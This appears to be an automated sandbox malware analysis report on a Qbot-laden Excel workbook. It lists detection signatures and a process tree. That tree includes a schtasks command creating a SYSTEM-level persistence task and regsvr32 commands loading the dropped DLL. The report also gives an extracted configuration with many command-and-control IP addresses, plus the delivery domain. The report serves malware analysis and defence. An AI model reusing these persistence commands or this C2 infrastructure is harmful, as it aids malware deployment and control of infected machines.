Play interactive tour

Edit tour

Analysis Report audit-1133808478.xlsb

Overview

General Information

Sample Name:	audit-1133808478.xlsb
Analysis ID:	433122
MD5:	dbab0aba5ca271442b08d027f3ed391f
SHA1:	0c163e79f6bffea037d225a221d0a701db03c2d0
SHA256:	8987dac6f44dda69ceb74d59c276d38227e285c78f74e2d835283d1baa308176
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0 Qbot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Found malware configuration

Malicious sample detected (through community Yara rule)

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: Schedule system process

Yara detected Qbot

Allocates memory in foreign processes

Contain functionality to detect virtual machines

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Drops PE files to the user root directory

Found Excel 4.0 Macro with suspicious formulas

Found abnormal large hidden Excel 4.0 Macro sheet

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Office process drops PE file

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Sigma detected: Microsoft Office Product Spawning Windows Shell

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Drops PE files to the user directory

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found evasive API chain checking for process token information

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

PE file does not import any functions

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Registers a DLL

Sample execution stops while process was sleeping (likely an evasion)

Tries to load missing DLLs

Uses code obfuscation techniques (call, push, ret)

Yara detected Xls With Macro 4.0

Yara signature match

Classification

Process Tree

System is w10x64

EXCEL.EXE (PID: 3348 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)

splwow64.exe (PID: 4272 cmdline: C:\Windows\splwow64.exe 12288 MD5: 8D59B31FF375059E3C32B17BF31A76D5)

regsvr32.exe (PID: 4760 cmdline: regsvr32 -s ..\covi1.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

explorer.exe (PID: 5828 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)

schtasks.exe (PID: 4144 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn hoqmcni /tr 'regsvr32.exe -s \'C:\Users\user\covi1.dll\'' /SC ONCE /Z /ST 11:04 /ET 11:16 MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 5672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

regsvr32.exe (PID: 6104 cmdline: regsvr32 -s ..\covi2.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

regsvr32.exe (PID: 6092 cmdline: regsvr32.exe -s 'C:\Users\user\covi1.dll' MD5: D78B75FC68247E8A63ACBA846182740E)

regsvr32.exe (PID: 3360 cmdline: -s 'C:\Users\user\covi1.dll' MD5: 426E7499F6A7346F0410DEAD0805586B)

WerFault.exe (PID: 4152 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3360 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

regsvr32.exe (PID: 3676 cmdline: regsvr32.exe -s 'C:\Users\user\covi1.dll' MD5: D78B75FC68247E8A63ACBA846182740E)

regsvr32.exe (PID: 3056 cmdline: -s 'C:\Users\user\covi1.dll' MD5: 426E7499F6A7346F0410DEAD0805586B)

WerFault.exe (PID: 5744 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3056 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Qbot

{"Bot id": "tr", "Campaign": "1623225382", "Version": "402.68", "C2 list": ["190.85.91.154:443", "140.82.49.12:443", "105.198.236.101:443", "68.186.192.69:443", "24.95.61.62:443", "90.65.234.26:2222", "197.45.110.165:995", "96.61.23.88:995", "172.78.51.35:443", "184.185.103.157:443", "71.163.222.223:443", "27.223.92.142:995", "24.179.77.236:443", "97.69.160.4:2222", "188.26.91.212:443", "75.67.192.125:443", "24.152.219.253:995", "92.59.35.196:2222", "47.22.148.6:443", "216.201.162.158:443", "76.25.142.196:443", "81.97.154.100:443", "81.214.126.173:2222", "71.41.184.10:3389", "83.110.109.189:2222", "125.239.44.146:995", "144.139.47.206:443", "75.118.1.141:443", "175.136.38.142:443", "98.192.185.86:443", "67.165.206.193:993", "73.151.236.31:443", "173.21.10.71:2222", "45.46.53.140:2222", "71.74.12.34:443", "45.63.107.192:2222", "45.63.107.192:443", "45.32.211.207:443", "45.32.211.207:8443", "149.28.101.90:995", "207.246.116.237:8443", "207.246.116.237:995", "207.246.116.237:2222", "45.77.117.108:2222", "45.77.117.108:8443", "149.28.98.196:995", "149.28.101.90:443", "45.77.117.108:443", "45.32.211.207:995", "45.32.211.207:2222", "45.77.115.208:995", "149.28.98.196:2222", "207.246.77.75:995", "45.77.115.208:8443", "207.246.77.75:2222", "144.202.38.185:443", "207.246.116.237:443", "149.28.101.90:2222", "149.28.101.90:8443", "45.77.115.208:2222", "45.77.115.208:443", "45.77.117.108:995", "149.28.98.196:443", "144.202.38.185:995", "207.246.77.75:8443", "207.246.77.75:443", "144.202.38.185:2222", "98.252.118.134:443", "149.28.99.97:443", "149.28.99.97:995", "149.28.99.97:2222", "45.63.107.192:995", "189.210.115.207:443", "105.198.236.99:443", "72.252.201.69:443", "151.205.102.42:443", "86.220.62.251:2222", "75.137.47.174:443", "72.240.200.181:2222", "95.77.223.148:443", "24.55.112.61:443", "24.229.150.54:995", "109.12.111.14:443", "24.139.72.117:443", "136.232.34.70:443", "50.29.166.232:995", "92.96.3.180:2078", "71.187.170.235:443", "68.204.7.158:443", "108.27.245.228:443", "83.196.56.65:2222", "50.244.112.106:443", "96.37.113.36:993", "24.122.166.173:443", "73.25.124.140:2222", "86.173.143.211:443", "47.196.213.73:443", "186.154.175.13:443", "70.163.161.79:443", "78.63.226.32:443", "195.6.1.154:2222", "76.168.147.166:993", "64.121.114.87:443", "77.27.207.217:995", "31.4.242.233:995", "125.62.192.220:443", "195.12.154.8:443", "71.117.132.169:443", "96.21.251.127:2222", "71.199.192.62:443", "70.168.130.172:995", "82.12.157.95:995", "209.210.187.52:995", "209.210.187.52:443", "67.6.12.4:443", "189.222.59.177:443", "174.104.22.30:443", "142.117.191.18:2222", "189.146.183.105:443", "213.60.147.140:443", "196.221.207.137:995", "108.46.145.30:443", "187.250.238.164:995", "2.7.116.188:2222", "195.43.173.70:443", "106.250.150.98:443", "45.67.231.247:443", "83.110.103.152:443", "83.110.9.71:2222", "78.97.207.104:443", "59.90.246.200:443", "80.227.5.69:443", "125.63.101.62:443", "86.236.77.68:2222", "109.106.69.138:2222", "84.72.35.226:443", "217.133.54.140:32100", "197.161.154.132:443", "89.137.211.239:995", "74.222.204.82:995", "122.148.156.131:995", "156.223.110.23:443", "144.139.166.18:443", "202.185.166.181:443", "76.94.200.148:995", "71.63.120.101:443", "196.151.252.84:443", "202.188.138.162:443", "74.68.144.202:443", "69.58.147.82:2078"]}

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
app.xml	JoeSecurity_XlsWithMacro4	Yara detected Xls With Macro 4.0	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.253198241.0000000000BD0000.00000004.00000001.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
00000003.00000002.253198241.0000000000BD0000.00000004.00000001.sdmp	QakBot	QakBot Payload	kevoreilly	0x1239d:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...
00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp	QakBot	QakBot Payload	kevoreilly	0x12f9d:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.explorer.exe.f50000.0.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
4.2.explorer.exe.f50000.0.unpack	QakBot	QakBot Payload	kevoreilly	0x1239d:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...
4.2.explorer.exe.f50000.0.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
4.2.explorer.exe.f50000.0.raw.unpack	QakBot	QakBot Payload	kevoreilly	0x12f9d:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...
3.2.regsvr32.exe.bd0000.2.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
3.2.regsvr32.exe.bd0000.2.unpack	QakBot	QakBot Payload	kevoreilly	0x1179d:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...
3.2.regsvr32.exe.bd0000.2.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
3.2.regsvr32.exe.bd0000.2.raw.unpack	QakBot	QakBot Payload	kevoreilly	0x1239d:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...
Click to see the 3 entries

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -s ..\covi1.dll, CommandLine: regsvr32 -s ..\covi1.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 3348, ProcessCommandLine: regsvr32 -s ..\covi1.dll, ProcessId: 4760

Persistence and Installation Behavior:

Sigma detected: Schedule system process

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn hoqmcni /tr 'regsvr32.exe -s \'C:\Users\user\covi1.dll\'' /SC ONCE /Z /ST 11:04 /ET 11:16, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn hoqmcni /tr 'regsvr32.exe -s \'C:\Users\user\covi1.dll\'' /SC ONCE /Z /ST 11:04 /ET 11:16, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 5828, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn hoqmcni /tr 'regsvr32.exe -s \'C:\Users\user\covi1.dll\'' /SC ONCE /Z /ST 11:04 /ET 11:16, ProcessId: 4144

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 4.2.explorer.exe.f50000.0.unpack

Malware Configuration Extractor: Qbot {"Bot id": "tr", "Campaign": "1623225382", "Version": "402.68", "C2 list": ["190.85.91.154:443", "140.82.49.12:443", "105.198.236.101:443", "68.186.192.69:443", "24.95.61.62:443", "90.65.234.26:2222", "197.45.110.165:995", "96.61.23.88:995", "172.78.51.35:443", "184.185.103.157:443", "71.163.222.223:443", "27.223.92.142:995", "24.179.77.236:443", "97.69.160.4:2222", "188.26.91.212:443", "75.67.192.125:443", "24.152.219.253:995", "92.59.35.196:2222", "47.22.148.6:443", "216.201.162.158:443", "76.25.142.196:443", "81.97.154.100:443", "81.214.126.173:2222", "71.41.184.10:3389", "83.110.109.189:2222", "125.239.44.146:995", "144.139.47.206:443", "75.118.1.141:443", "175.136.38.142:443", "98.192.185.86:443", "67.165.206.193:993", "73.151.236.31:443", "173.21.10.71:2222", "45.46.53.140:2222", "71.74.12.34:443", "45.63.107.192:2222", "45.63.107.192:443", "45.32.211.207:443", "45.32.211.207:8443", "149.28.101.90:995", "207.246.116.237:8443", "207.246.116.237:995", "207.246.116.237:2222", "45.77.117.108:2222", "45.77.117.108:8443", "149.28.98.196:995", "149.28.101.90:443", "45.77.117.108:443", "45.32.211.207:995", "45.32.211.207:2222", "45.77.115.208:995", "149.28.98.196:2222", "207.246.77.75:995", "45.77.115.208:8443", "207.246.77.75:2222", "144.202.38.185:443", "207.246.116.237:443", "149.28.101.90:2222", "149.28.101.90:8443", "45.77.115.208:2222", "45.77.115.208:443", "45.77.117.108:995", "149.28.98.196:443", "144.202.38.185:995", "207.246.77.75:8443", "207.246.77.75:443", "144.202.38.185:2222", "98.252.118.134:443", "149.28.99.97:443", "149.28.99.97:995", "149.28.99.97:2222", "45.63.107.192:995", "189.210.115.207:443", "105.198.236.99:443", "72.252.201.69:443", "151.205.102.42:443", "86.220.62.251:2222", "75.137.47.174:443", "72.240.200.181:2222", "95.77.223.148:443", "24.55.112.61:443", "24.229.150.54:995", "109.12.111.14:443", "24.139.72.117:443", "136.232.34.70:443", "50.29.166.232:995", "92.96.3.180:2078", "71.187.170.235:443", "68.204.7.158:443", "108.27.245.228:443", "83.196.56.65:2222", "50.244.112.106:443", "96.37.113.36:993", "24.122.166.173:443", "73.25.124.140:2222", "86.173.143.211:443", "47.196.213.73:443", "186.154.175.13:443", "70.163.161.79:443", "78.63.226.32:443", "195.6.1.154:2222", "76.168.147.166:993", "64.121.114.87:443", "77.27.207.217:995", "31.4.242.233:995", "125.62.192.220:443", "195.12.154.8:443", "71.117.132.169:443", "96.21.251.127:2222", "71.199.192.62:443", "70.168.130.172:995", "82.12.157.95:995", "209.210.187.52:995", "209.210.187.52:443", "67.6.12.4:443", "189.222.59.177:443", "174.104.22.30:443", "142.117.191.18:2222", "189.146.183.105:443", "213.60.147.140:443", "196.221.207.137:995", "108.46.145.30:443", "187.250.238.164:995", "2.7.116.188:2222", "195.43.173.70:443", "106.250.150.98:443", "45.67.231.247:443", "83.110.103.152:443", "83.110.9.71:2222", "78.97.207.104:443", "59.90.246.200:443", "80.227.5.69:443", "125.63.101.62:443", "86.236.77.68:2222", "109.106.69.138:2222", "84.72.35.226:443", "217.133.54.140:

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\pt[1].htm	Joe Sandbox ML: detected
Source: C:\Users\user\covi1.dll	Joe Sandbox ML: detected

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 43.225.55.182:443 -> 192.168.2.3:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.185.33.154:443 -> 192.168.2.3:49723 version: TLS 1.2

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 4_2_00F5AEE4 FindFirstFileW,FindNextFileW,

4_2_00F5AEE4

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\covi1.dll

Jump to behavior

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: pt[1].htm.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Section loaded: unknown origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe

Source: global traffic

DNS query: name: shadiinfo.com

Source: global traffic

TCP traffic: 192.168.2.3:49720 -> 43.225.55.182:443

Source: global traffic

TCP traffic: 192.168.2.3:49720 -> 43.225.55.182:443

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

DNS traffic detected: queries for: shadiinfo.com

Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://api.cortana.ai
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://api.office.net
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://augloop.office.com
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://cdn.entity.
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://cortana.ai
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://cortana.ai/api
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://cr.office.com
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://directory.services.
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://graph.windows.net
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://login.windows.local
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://management.azure.com
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://management.azure.com/
Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	String found in binary or memory: https://messaging.office.com/
